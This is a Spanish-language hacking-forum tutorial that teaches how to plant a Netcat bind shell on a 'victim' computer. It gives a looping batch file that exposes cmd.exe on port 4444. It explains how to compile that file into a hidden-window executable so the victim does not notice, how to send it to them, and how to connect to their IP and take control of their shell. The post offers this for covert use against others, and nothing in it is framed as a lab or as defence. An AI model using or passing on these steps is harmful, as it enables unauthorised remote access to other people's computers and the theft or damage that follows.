Bueno, comienzo el manual de como obtener una SHELL con NETCAT =)
Comenzemos.
Bueno antes de comensar el archivo nc.exe despues mencionado tambien tiene que estar en la computadora de la "victima" preferente mente en el directorio
c:\WINDOWS\system32\
Mas adelante pondre algun modo de hacer esto automatico sin nesesidad de tanto problema.
Primero, antes que nada nos tenemos que bajar el NETCAT desde aca:
Para ver este enlace Registrate o Inicia SesionLo descomprimimos

Y luego abrimos la carpeta donde se descomprmió.
Ahora copiamos el archivo llamado nc.exe a la carpeta
C:\WINDOWS\system32\

y listo.
Bueno, ahora para poder conectarnos a nuestra "victima" tenemos que mandarle este archivo .bat que es el
que contiene los comandos nesesarios para que una ves conectados a la ip de nuestra "victima"
En el archivo abre.bat se encuentra esto:
echo off
cls
:net
nc -L -p 4444 -e cmd.exe
goto net
Es un sencillo bat que lo que hace es ahí mismo es abierto dejar el puerto "4444" a la escucha para
cualquiera que quiera conectarse a esa IP y que se abra el cmd.exe y tengamos acceso a su SHELL.
Bueno, les explicare el mini code:
-L es para que se mantenga a la escucha asi se cierre la coneccion.
-p es para especificar el puerto por el cual conectarse
-e es para que cuando nos conectemos se abra tal cosa.
Pero un problema seria como mandarselo a mi victima sin que se le habra la ventanida negra y se de
cuenta =O. Pues bueno, lo que hares es convertirlo a .exe con el "Fast Exe-Batch Maker.exe" de Hendrix. se lo pueden bajar de aca
Para ver este enlace Registrate o Inicia Sesion(si el link no funciona es que mi pc esta apagada)
Bueno, abrimos el Fast Exe maker y seleccionamos el .bat como ven aca.

Ahora hacemos click en la opcion MODO OCULTO y en compilar, y elegimos el nombre con el que queremos
guardar el .exe .

Bueno, yo cree el archivo con el nombre abre.exe =P
Listo, ahora ese archivo debemos de mandarselo a nuestra "victima", y solo haria falta que lo abra.
Ahora el siguiente paso es optener la IP de la victima, no voy a explicar eso a detalle debido a que en
el foro ya hay varios POSTS con esos temas asi que ponganse a buscar =P.
Bueno, suponiendo de que ya tenemos la IP , es hora de la accion =)
Vamos a INICO>EJECUTAR>y escribimos "cmd" sin comillas obiamente como lo ven en esta imagen

NOs aparecera una ventanita negra como esta.

Ahora, vamos a ingresar el siguiente code:
nc [IP] [PUERTO]
(asi de simple)
en mi caso seria
nc 192.168.1.34 4444
el "192.168.1.34" es la IP de mi victima y el "4444" es el puerto al que esta a la escucha.
Apretamos ENTER y si todo va bien nos aparecera esto:

Eso significa que hicimos todo bien!!!
ahora tenemos la shell de nuestra victima y es como si estuvieramos en su computadora =p.
si nos queremos desconectar simplemente ponemos ctrl+c o cerramos la ventana y listo.

espero comentarios, sugerencias y dudas =P
salu2
..<<<By DarkAngel>>>...